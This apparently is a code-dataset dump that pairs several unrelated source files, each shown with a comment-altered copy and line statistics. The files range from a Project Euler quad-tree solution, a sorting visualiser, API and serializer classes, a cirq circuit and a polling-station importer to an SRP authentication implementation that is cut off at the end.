# Suppose we are given a square 2D region with endpoints [xstart, xend) and [ystart, yend).
# If the region is entirely white or entirely black, then it takes 2 bits to encode the region.
# Otherwise the region must have both white and black pixels, so we use 1 bit
# to encode the split, recurse on the 4 sub-squares, and sum their code lengths.
#
# Within the region, what are the possible values of the left side of the formula, x^2 + y^2?
# To minimize or maximize x^2 + y^2, we can min/maximize each of x^2 and y^2 independently.
# - To minimize x^2, we minimize |x|. If 0 is in [xstart, xend),
# then the minimum |x| is 0, and thus the minimum x^2 is 0.
# Otherwise, either all possible x values are negative or all
# are positive, so the minimum |x| is min(|xstart|, |xend-1|).
# - To maximize x^2, we maximize |x|. This simply equals max(|xstart|, |xend-1|).
# - The same arguments apply to minimizing/maximizing y^2.
#
# Now evaluate minR^2 = minX^2 + minY^2, and maxR^2 = maxX^2 + maxY^2.
# - If maxR^2 <= R^2, then all points in the region satisfy
# x^2 + y^2 <= R^2, hence the entire region is black.
# - Similarly, if minR^2 > R^2, then all points in the region
# satisfy x^2 + y^2 > R^2, hence the entire region is white.
# - Otherwise, the region must contain both black and white points,
# so we split into 4 subregions and recurse.
#
# One further optimization: If the region [xstart, xend) * [ystart, yend) lies
# entirely within a quadrant, then calculating minR and maxR becomes trivial.
# In fact, only the root call to compressed_length() spans both positive
# and negative coordinates; all deeper calls are entirely within a quadrant.
# For a region with [xstart, xend) where xstart < xend <= 0, compressed_length()
# yields the same result when the range is replaced with [-xend + 1, -xstart + 1).
# Hence by symmetry, we can only consider cases where 0 <= xstart < xend,
# and not deal with negative ranges. This optimized bit length algorithm can
# no longer be adapted to encode the actual compressed bit stream, however.
def compute(n=24):
    """Project Euler 287: return (as a string) the number of bits in the
    quad-tree encoding of a 2^n x 2^n black/white image of the disc
    x^2 + y^2 <= 2^(2n-2).

    Generalization: the image exponent ``n`` (originally hard-coded to 24)
    is now a parameter with default 24, so ``compute()`` is unchanged for
    existing callers while small instances become testable.
    """
    radius_squared = 2 ** (2 * n - 2)

    def compressed_length(xstart, xend, ystart, yend):
        # Exact minimum number of bits needed to encode the image region
        # [xstart, xend) x [ystart, yend); requires 0 <= xstart < xend and
        # 0 <= ystart < yend (callers mirror all quadrants into the first,
        # per the symmetry argument in the header comment above).
        if xstart * xstart + ystart * ystart > radius_squared:  # all white
            return 2
        if (xend - 1) * (xend - 1) + (yend - 1) * (yend - 1) <= radius_squared:  # all black
            return 2
        # Mixed region: 1 split bit plus the four recursive sub-squares.
        xmid = (xstart + xend) >> 1
        ymid = (ystart + yend) >> 1
        return (1 +
                compressed_length(xstart, xmid, ymid, yend) +    # top left
                compressed_length(xmid, xend, ymid, yend) +      # top right
                compressed_length(xstart, xmid, ystart, ymid) +  # bottom left
                compressed_length(xmid, xend, ystart, ymid))     # bottom right

    half = 2 ** (n - 1)
    # Root split bit plus the four quadrants, each mapped into non-negative
    # coordinates (a negative range [xstart, xend) is equivalent to
    # [-xend + 1, -xstart + 1)).
    return str(1 +
               compressed_length(0, half, 0, half) +
               compressed_length(0, half, 1, half + 1) +
               compressed_length(1, half + 1, 0, half) +
               compressed_length(1, half + 1, 1, half + 1))


if __name__ == "__main__":
    print(compute())
| 47.935897 | 95 | 0.682268 |
def compute():
	# Project Euler 287: bits needed for the quad-tree encoding of a
	# 2^N x 2^N black/white image of the disc x^2 + y^2 <= 2^(2N-2).
	N = 24
	RADIUS_SQUARED = 2**(2 * N - 2)
	# Exact minimum number of bits to encode the region
	# [xstart, xend) x [ystart, yend),
	# requiring 0 <= xstart < xend and 0 <= ystart < yend.
	def compressed_length(xstart, xend, ystart, yend):
		if xstart * xstart + ystart * ystart > RADIUS_SQUARED: # All white
			return 2
		elif (xend - 1) * (xend - 1) + (yend - 1) * (yend - 1) <= RADIUS_SQUARED: # All black
			return 2
		else: # Subdivide and recurse
			xmid = (xstart + xend) >> 1
			ymid = (ystart + yend) >> 1
			return (1 +
				compressed_length(xstart, xmid, ymid , yend) + # Top left
				compressed_length(xmid , xend, ymid , yend) + # Top right
				compressed_length(xstart, xmid, ystart, ymid) + # Bottom left
				compressed_length(xmid , xend, ystart, ymid)) # Bottom right
	# Root split bit plus the four quadrants, each mirrored into
	# non-negative coordinates by the disc's symmetry.
	temp = 2**(N - 1)
	return str(1 +
		compressed_length(0, temp, 0, temp) +
		compressed_length(0, temp, 1, temp + 1) +
		compressed_length(1, temp + 1, 0, temp) +
		compressed_length(1, temp + 1, 1, temp + 1))
if __name__ == "__main__":
	print(compute())
| true | true |
790112e17cfb3b5d10e1f0b58ddb487cbd6dffba | 1,540 | py | Python | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | from interface import *
class M2:
    """Visualised cocktail-shaker sort driven through ``Interface``.

    NOTE(review): ``interface`` is a *class* attribute, so every M2 instance
    shares one Interface object -- kept as-is for backward compatibility.
    """

    interface = Interface()

    def __init__(self, tamanhoDaLista, tempoDeAtraso, charPixel=' '):
        # Kept for backward compatibility with any external readers; the
        # sort below now swaps via tuple assignment and no longer uses it.
        self.guardarNumero = 0
        self.interface.set_tamanhoDaLista(tamanhoDaLista)
        self.interface.set_tempoDeAtraso(tempoDeAtraso)
        self.interface.set_charPixel(charPixel)

    def Maneira2(self):
        """Sort ``self.interface.lista`` in place, redrawing after each swap.

        One forward and one backward bubble pass per element (cocktail
        shaker sort).  Changes from the original: the no-op statement
        ``self.guardarNumero`` was removed, the redundant ``i+1 == len``
        guard became a shorter range, and swaps use tuple assignment
        instead of a temporary.  Assumes converterPMostrar does not change
        the list length mid-pass -- confirm against Interface.
        """
        for _ in range(len(self.interface.lista)):
            # Forward pass: larger values bubble to the right.
            for i in range(len(self.interface.lista) - 1):
                if self.interface.lista[i] > self.interface.lista[i + 1]:
                    self.interface.lista[i], self.interface.lista[i + 1] = (
                        self.interface.lista[i + 1], self.interface.lista[i])
                    self.interface.converterPMostrar(i + 1)
            # Backward pass: smaller values bubble to the left.
            for i in reversed(range(len(self.interface.lista) - 1)):
                if self.interface.lista[i] > self.interface.lista[i + 1]:
                    self.interface.lista[i], self.interface.lista[i + 1] = (
                        self.interface.lista[i + 1], self.interface.lista[i])
                    self.interface.converterPMostrar(i)
| 37.560976 | 83 | 0.518831 | from interface import *
class M2:
    """Visualised cocktail-shaker sort driven through ``Interface``."""
    # NOTE(review): class attribute -- one Interface shared by all instances.
    interface = Interface()
    def __init__(self, tamanhoDaLista, tempoDeAtraso, charPixel = ' '):
        # guardarNumero ("store number") is only used as a swap temporary below.
        self.guardarNumero = 0
        self.interface.set_tamanhoDaLista(tamanhoDaLista)
        self.interface.set_tempoDeAtraso(tempoDeAtraso)
        self.interface.set_charPixel(charPixel)
    def Maneira2(self):
        # No-op attribute access -- likely leftover; candidate for removal.
        self.guardarNumero
        # One forward + one backward bubble pass per element; the display is
        # refreshed via converterPMostrar after every swap.
        for c in range(len(self.interface.lista)):
            # Forward pass: larger values bubble to the right.
            for i in range(len(self.interface.lista)):
                if i+1 == len(self.interface.lista):
                    continue
                else:
                    if self.interface.lista[i] > self.interface.lista[i+1]:
                        guardarNumero = self.interface.lista[i]
                        self.interface.lista[i] = self.interface.lista[i+1]
                        self.interface.lista[i+1] = guardarNumero
                        self.interface.converterPMostrar(i+1)
            # Backward pass: smaller values bubble to the left.
            for i in reversed(range(len(self.interface.lista))):
                if i+1 == len(self.interface.lista):
                    continue
                else:
                    if self.interface.lista[i] > self.interface.lista[i+1]:
                        guardarNumero = self.interface.lista[i]
                        self.interface.lista[i] = self.interface.lista[i+1]
                        self.interface.lista[i+1] = guardarNumero
                        self.interface.converterPMostrar(i)
| true | true |
790113315ce4aa4ae68f9d7785b54a2d40e710ea | 361 | py | Python | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | '''
Created by auto_sdk on 2021.03.10
'''
from dingtalk.api.base import RestApi
class OapiCateringUnfreezeRequest(RestApi):
    """Request object for the DingTalk ``dingtalk.oapi.catering.unfreeze``
    endpoint (auto-generated SDK style); callers fill in the parameter
    attributes before executing the request."""

    def __init__(self, url=None):
        super().__init__(url)
        # Request parameters, unset until the caller assigns them.
        self.order_id = None
        self.rule_code = None
        self.userid = None

    def getHttpMethod(self):
        """HTTP verb used for this API call."""
        return 'POST'

    def getapiname(self):
        """Dotted DingTalk API name used for request routing."""
        return 'dingtalk.oapi.catering.unfreeze'
| 21.235294 | 43 | 0.747922 | from dingtalk.api.base import RestApi
class OapiCateringUnfreezeRequest(RestApi):
    """DingTalk catering-unfreeze REST request (auto-generated SDK style)."""

    def __init__(self, url=None):
        super().__init__(url)
        # Endpoint parameters; assigned by the caller before execution.
        self.order_id = None
        self.rule_code = None
        self.userid = None

    def getHttpMethod(self):
        """This endpoint is invoked with POST."""
        return 'POST'

    def getapiname(self):
        """Fully-qualified DingTalk API name."""
        return 'dingtalk.oapi.catering.unfreeze'
| true | true |
790113e7815d2c7812f36d9d8f3b5e1d1896e669 | 2,341 | py | Python | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=25
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
    """Build the generated 4-qubit benchmark circuit.

    The gate sequence reproduces the generator's numbering (H layer, then a
    CZ/CNOT/X pattern on qubits 0, 2 and 3); ``n`` is unused here but kept
    for interface compatibility with the generator.
    """
    operations = [
        cirq.H(input_qubit[0]),
        cirq.H(input_qubit[1]),
        cirq.H(input_qubit[1]),
        cirq.H(input_qubit[2]),
        cirq.H(input_qubit[3]),
        cirq.H(input_qubit[0]),
        cirq.CZ(input_qubit[3], input_qubit[0]),
        cirq.H(input_qubit[0]),
        cirq.CNOT(input_qubit[0], input_qubit[2]),
        cirq.X(input_qubit[2]),
        cirq.CNOT(input_qubit[0], input_qubit[2]),
        cirq.H(input_qubit[0]),
        cirq.CZ(input_qubit[3], input_qubit[0]),
        cirq.H(input_qubit[0]),
        cirq.CNOT(input_qubit[2], input_qubit[0]),
        cirq.H(input_qubit[0]),
        cirq.CZ(input_qubit[2], input_qubit[0]),
        cirq.H(input_qubit[0]),
        cirq.X(input_qubit[2]),
        cirq.X(input_qubit[2]),
    ]
    circuit = cirq.Circuit()
    # Append one operation at a time, matching the original call pattern
    # (cirq.Gate.__call__ is equivalent to Gate.on).
    for operation in operations:
        circuit.append(operation)
    return circuit
def bitstring(bits):
    """Render an iterable of bit-like values as a string of decimal digits."""
    return "".join(map(str, (int(bit) for bit in bits)))
if __name__ == '__main__':
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
    circuit = make_circuit(qubit_count,input_qubits)
    # Compile the circuit for Google's Sycamore gate set.
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
    circuit_sample_count =0  # unused; kept by the generator
    # Exact simulation: final state vector of the compiled circuit.
    info = cirq.final_state_vector(circuit)
    qubits = round(log2(len(info)))
    # Probability of each basis state, |amplitude|^2, rounded to 3 decimals.
    frequencies = {
        np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
        for i in range(2 ** qubits)
    }
    # Dump probabilities, circuit depth and diagram to the data CSV.
    writefile = open("../data/startCirq_Class840.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)
    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)
    writefile.close()
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
def make_circuit(n: int, input_qubit):
    """Build the generated 4-qubit benchmark circuit (H layer followed by a
    CZ/CNOT/X pattern on qubits 0, 2 and 3); ``n`` is unused here."""
    c = cirq.Circuit()
    # Hadamard layer.
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.H.on(input_qubit[1]))
    c.append(cirq.H.on(input_qubit[1]))
    c.append(cirq.H.on(input_qubit[2]))
    c.append(cirq.H.on(input_qubit[3]))
    # Entangling/flip pattern emitted by the generator.
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CZ.on(input_qubit[3],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.X.on(input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CZ.on(input_qubit[3],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CZ.on(input_qubit[2],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.X.on(input_qubit[2]))
    c.append(cirq.X.on(input_qubit[2]))
    return c
def bitstring(bits):
    """Concatenate each bit-like value of *bits* as its decimal digit."""
    return "".join([str(int(b)) for b in bits])
if __name__ == '__main__':
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
    circuit = make_circuit(qubit_count,input_qubits)
    # Compile for the Sycamore sqrt-iSWAP gate set, then simulate exactly.
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
    circuit_sample_count =0  # unused; kept by the generator
    info = cirq.final_state_vector(circuit)
    qubits = round(log2(len(info)))
    # Basis-state probabilities |amplitude|^2, rounded to 3 decimals.
    frequencies = {
        np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
        for i in range(2 ** qubits)
    }
    # Write probabilities, circuit depth and diagram to the data CSV.
    writefile = open("../data/startCirq_Class840.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)
    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)
    writefile.close()
7901144608dc0639a38b27d7fe8ce58d40d01b0a | 1,315 | py | Python | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | 1 | 2021-08-18T18:53:02.000Z | 2021-08-18T18:53:02.000Z | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | null | null | null | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | 1 | 2021-08-04T23:53:52.000Z | 2021-08-04T23:53:52.000Z | from rest_framework import serializers
from gestion.models.providerOrder import ProviderOrder
from auth_app.serializers.userSerializer import UserSerializer
from gestion.serializers.providerSerializer import ProviderSerializer
from auth_app.models.user import User
from gestion.models.provider import Provider
from serverConfig.utils import check_user_has_permission
class ProviderOrderSerializer(serializers.ModelSerializer):
    """DRF serializer for ProviderOrder with nested seller/provider and two
    computed fields (order line list and a zero-padded order number)."""
    seller = UserSerializer(read_only=True)
    provider = ProviderSerializer(read_only=True)
    # Method field with an explicit, non-default method name ("getOrderList").
    orderList = serializers.SerializerMethodField("getOrderList", required=False)
    # NOTE(review): SerializerMethodField forces read_only=True internally,
    # so these kwargs appear to have no effect -- confirm against DRF docs.
    orderNumber = serializers.SerializerMethodField(read_only=False, required=False)
    class Meta:
        model = ProviderOrder
        # Parentheses are redundant: this is the string '__all__', not a tuple.
        fields = ('__all__')
    def create(self, validated_data):
        # Straight pass-through to the model manager.
        order = ProviderOrder.objects.create(**validated_data)
        return order
    def update(self, instance, validated_data):
        # Delegates entirely to ModelSerializer.update.
        return super().update(instance, validated_data)
    def getOrderList(self, obj):
        # Local import -- presumably avoids a circular import with
        # entriesSerializer; verify before hoisting to module level.
        from .entriesSerializer import EntriesSerializer
        return EntriesSerializer(obj.orderList(), context=self.context, many=True).data
    def get_orderNumber(self, obj: ProviderOrder):
        # Display form of the primary key, zero-padded to 5 digits.
        return str(obj.id).zfill(5)
from gestion.models.providerOrder import ProviderOrder
from auth_app.serializers.userSerializer import UserSerializer
from gestion.serializers.providerSerializer import ProviderSerializer
from auth_app.models.user import User
from gestion.models.provider import Provider
from serverConfig.utils import check_user_has_permission
class ProviderOrderSerializer(serializers.ModelSerializer):
    """DRF serializer for ProviderOrder: nested seller/provider plus computed
    order-line list and zero-padded order number."""
    seller = UserSerializer(read_only=True)
    provider = ProviderSerializer(read_only=True)
    orderList = serializers.SerializerMethodField("getOrderList", required=False)
    # NOTE(review): SerializerMethodField is always read-only; these kwargs
    # appear ineffective -- confirm against DRF documentation.
    orderNumber = serializers.SerializerMethodField(read_only=False, required=False)
    class Meta:
        model = ProviderOrder
        # This is the string '__all__'; the parentheses are redundant.
        fields = ('__all__')
    def create(self, validated_data):
        # Pass-through to the model manager.
        order = ProviderOrder.objects.create(**validated_data)
        return order
    def update(self, instance, validated_data):
        return super().update(instance, validated_data)
    def getOrderList(self, obj):
        # Local import -- presumably breaks a circular import; verify.
        from .entriesSerializer import EntriesSerializer
        return EntriesSerializer(obj.orderList(), context=self.context, many=True).data
    def get_orderNumber(self, obj: ProviderOrder):
        # Primary key zero-padded to 5 digits.
        return str(obj.id).zfill(5)
790114aa0c0efff55f9d68a6bd2bd3434ece70e4 | 472 | py | Python | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | 1 | 2019-07-20T15:22:19.000Z | 2019-07-20T15:22:19.000Z | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | null | null | null | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | null | null | null | from interpolate import interpolate_doc
foo = """
hello
world
"""
bar = "foo bar\nbaz"
class Foo:
    # cf matplotlib's kwdoc: interpolate_doc substitutes this __kw__ text
    # where a docstring references {Foo!K} (inferred from the field below;
    # confirm against interpolate.interpolate_doc).
    __kw__ = "the kw of foo"
# interpolate_doc processes the docstring below at decoration time; the
# {...} fields are substitution points, so this docstring is program input
# here -- do not edit it as mere documentation.
# NOTE(review): {interpolate_example.foo} implies this file is
# interpolate_example.py -- confirm before renaming the module.
@interpolate_doc
def func():
    """
    this is a docstring
    {interpolate_example.foo}
    {bar}
    {Foo!K}
    """
# Demonstrates the error path: a field like {must} with no preceding
# whitespace is rejected by interpolate_doc with a ValueError.
try:
    @interpolate_doc
    def bad_doc():
        """
        fields {must} be preceded by whitespace
        """
except ValueError:
    print("error correctly caught")
| 12.756757 | 47 | 0.576271 | from interpolate import interpolate_doc
foo = """
hello
world
"""
bar = "foo bar\nbaz"
class Foo:
    # Substitution source for {Foo!K} fields in interpolated docstrings.
    __kw__ = "the kw of foo"
# Restored: comment stripping removed the docstrings, leaving both function
# bodies empty (a SyntaxError).  The docstrings are program input to
# interpolate_doc, not comments, and are reinstated from the intact copy.
@interpolate_doc
def func():
    """
    this is a docstring
    {interpolate_example.foo}
    {bar}
    {Foo!K}
    """

# A field like {must} with no preceding whitespace is rejected with ValueError.
try:
    @interpolate_doc
    def bad_doc():
        """
        fields {must} be preceded by whitespace
        """
except ValueError:
    print("error correctly caught")
| true | true |
790114b62661448156a89416653afbbad7a619d7 | 1,346 | py | Python | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 29 | 2015-03-10T08:41:34.000Z | 2022-01-12T08:51:38.000Z | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 4,112 | 2015-04-01T21:27:38.000Z | 2022-03-31T19:22:11.000Z | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 31 | 2015-03-18T14:52:50.000Z | 2022-02-24T10:31:07.000Z | from data_importers.github_importer import BaseGitHubImporter
class Command(BaseGitHubImporter):
srid = 27700
districts_srid = 27700
council_id = "EPS"
elections = ["2021-05-06"]
scraper_name = "wdiv-scrapers/DC-PollingStations-EpsomAndEwell"
geom_type = "gml"
seen = set()
def district_record_to_dict(self, record):
poly = self.extract_geometry(record, self.geom_type, self.get_srid("districts"))
if record["id"] in [
"pollingdistricts.33",
"pollingdistricts.38",
"pollingdistricts.50",
]:
return None
return {
"internal_council_id": record["district"],
"name": record["district"],
"area": poly,
}
def station_record_to_dict(self, record):
postcode = " ".join(record["address"].split(" ")[-2:])
point = self.extract_geometry(record, self.geom_type, self.get_srid())
if (record["district"], postcode) in self.seen:
return None
else:
self.seen.add((record["district"], postcode))
return {
"internal_council_id": record["psnumber"],
"polling_district_id": record["district"],
"address": record["address"],
"postcode": postcode,
"location": point,
}
| 30.590909 | 88 | 0.581724 | from data_importers.github_importer import BaseGitHubImporter
class Command(BaseGitHubImporter):
srid = 27700
districts_srid = 27700
council_id = "EPS"
elections = ["2021-05-06"]
scraper_name = "wdiv-scrapers/DC-PollingStations-EpsomAndEwell"
geom_type = "gml"
seen = set()
def district_record_to_dict(self, record):
poly = self.extract_geometry(record, self.geom_type, self.get_srid("districts"))
if record["id"] in [
"pollingdistricts.33",
"pollingdistricts.38",
"pollingdistricts.50",
]:
return None
return {
"internal_council_id": record["district"],
"name": record["district"],
"area": poly,
}
def station_record_to_dict(self, record):
postcode = " ".join(record["address"].split(" ")[-2:])
point = self.extract_geometry(record, self.geom_type, self.get_srid())
if (record["district"], postcode) in self.seen:
return None
else:
self.seen.add((record["district"], postcode))
return {
"internal_council_id": record["psnumber"],
"polling_district_id": record["district"],
"address": record["address"],
"postcode": postcode,
"location": point,
}
| true | true |
7901160068a3177560677e18df2d12b7cca78efa | 9,763 | py | Python | homekit/crypto/srp.py | kvaellning/homekit_python | 88e507541bbab7d662d7bf41e452f99540ac850e | [
"Apache-2.0"
] | 3 | 2017-08-01T17:45:58.000Z | 2017-08-12T07:41:53.000Z | homekit/crypto/srp.py | jlusiardi/homekit_client | b7d9fe730159ec90bf7a82010150d38112d4b1fc | [
"Apache-2.0"
] | null | null | null | homekit/crypto/srp.py | jlusiardi/homekit_client | b7d9fe730159ec90bf7a82010150d38112d4b1fc | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# Copyright 2018 Joachim Lusiardi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Implements the Secure Remote Password (SRP) algorithm. More information can be found on
https://tools.ietf.org/html/rfc5054. See HomeKit spec page 36 for adjustments imposed by Apple.
"""
import math
import hashlib
import os
class Srp:
    """
    Shared state and hash helpers for both sides of the SRP handshake:
    RFC 5054 3072-bit group parameters, SHA-512 digest as required by the
    HomeKit spec (page 36).
    """

    def __init__(self):
        # Generator of the 3072-bit group from RFC 5054.
        self.g = 5
        # Modulus of the 3072-bit group from RFC 5054.
        modulus_hex = (
            'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08'
            '8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B'
            '302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9'
            'A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6'
            '49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8'
            'FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D'
            '670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C'
            '180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718'
            '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D'
            '04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D'
            'B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226'
            '1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C'
            'BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC'
            'E0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF'
        )
        self.n = int(modulus_hex, 16)
        # HomeKit mandates SHA-512.
        self.h = hashlib.sha512
        self.A = None        # client public key
        self.B = None        # server public key
        self.salt = None
        self.username = None
        self.password = None

    @staticmethod
    def generate_private_key():
        """Return a random 16-byte (128-bit) key as an integer (os.urandom)."""
        return int.from_bytes(os.urandom(16), 'big')

    def _calculate_k(self) -> int:
        """SRP multiplier k = H(N | PAD(g)) per RFC 5054 section 2.5.3."""
        digest = self.h()
        digest.update(Srp.to_byte_array(self.n))
        # g padded with zero bytes to the 384-byte length of N.
        digest.update(bytearray.fromhex(383 * '00' + '05'))
        return int.from_bytes(digest.digest(), 'big')

    def _calculate_u(self) -> int:
        """Scrambling parameter u = H(A | B); both public keys must be set."""
        if self.A is None:
            raise RuntimeError("Client's public key is missing")
        if self.B is None:
            raise RuntimeError("Server's public key is missing")
        digest = self.h()
        digest.update(Srp.to_byte_array(self.A))
        digest.update(Srp.to_byte_array(self.B))
        return int.from_bytes(digest.digest(), 'big')

    def get_session_key(self) -> int:
        """Session key K = H(S), where S comes from the subclass."""
        digest = self.h()
        digest.update(Srp.to_byte_array(self.get_shared_secret()))
        return int.from_bytes(digest.digest(), 'big')

    @staticmethod
    def to_byte_array(num: int) -> bytearray:
        """Minimal-length big-endian byte representation of *num*."""
        return bytearray(num.to_bytes((num.bit_length() + 7) // 8, 'big'))

    def _calculate_x(self) -> int:
        """x = H(salt | H(username ':' password)) per RFC 5054."""
        inner = self.h()
        inner.update((self.username + ':' + self.password).encode())
        outer = self.h()
        outer.update(Srp.to_byte_array(self.salt))
        outer.update(inner.digest())
        return int.from_bytes(outer.digest(), 'big')

    def get_shared_secret(self):
        """Side-specific shared-secret computation; subclasses implement."""
        raise NotImplementedError()
class SrpClient(Srp):
    """
    Controller (iOS-device) side of the SRP handshake.
    """

    def __init__(self, username: str, password: str):
        Srp.__init__(self)
        self.username = username
        self.password = password
        self.salt = None
        # Ephemeral private key a and public key A = g^a mod n.
        self.a = self.generate_private_key()
        self.A = pow(self.g, self.a, self.n)
        self.B = None

    def set_salt(self, salt):
        """Store the server-supplied salt (accepts bytes or int)."""
        if isinstance(salt, (bytearray, bytes)):
            self.salt = int.from_bytes(salt, 'big')
        else:
            self.salt = salt

    def get_public_key(self):
        """Return A = g^a mod n."""
        return pow(self.g, self.a, self.n)

    def set_server_public_key(self, B):
        """Store the server's public key B (accepts bytes or int)."""
        self.B = int.from_bytes(B, 'big') if isinstance(B, (bytearray, bytes)) else B

    def get_shared_secret(self):
        """S = (B - k*g^x) ^ (a + u*x) mod n."""
        if self.B is None:
            raise RuntimeError("Server's public key is missing")
        u = self._calculate_u()
        x = self._calculate_x()
        k = self._calculate_k()
        base = self.B - k * pow(self.g, x, self.n)
        exponent = self.a + u * x
        return pow(base, exponent, self.n)

    def get_proof(self):
        """Client proof M1 = H((H(N) xor H(g)) | H(I) | s | A | B | K)."""
        if self.B is None:
            raise RuntimeError("Server's public key is missing")
        xor_digest = bytearray(self.h(Srp.to_byte_array(self.n)).digest())
        for i, byte in enumerate(self.h(Srp.to_byte_array(self.g)).digest()):
            xor_digest[i] ^= byte
        identity_hash = self.h(self.username.encode()).digest()
        proof = self.h()
        for part in (xor_digest,
                     identity_hash,
                     Srp.to_byte_array(self.salt),
                     Srp.to_byte_array(self.A),
                     Srp.to_byte_array(self.B),
                     Srp.to_byte_array(self.get_session_key())):
            proof.update(part)
        return int.from_bytes(proof.digest(), 'big')

    def verify_servers_proof(self, M):
        """Check the server proof M2 against H(A | M1 | K)."""
        received = int.from_bytes(M, 'big') if isinstance(M, (bytearray, bytes)) else M
        expected = self.h()
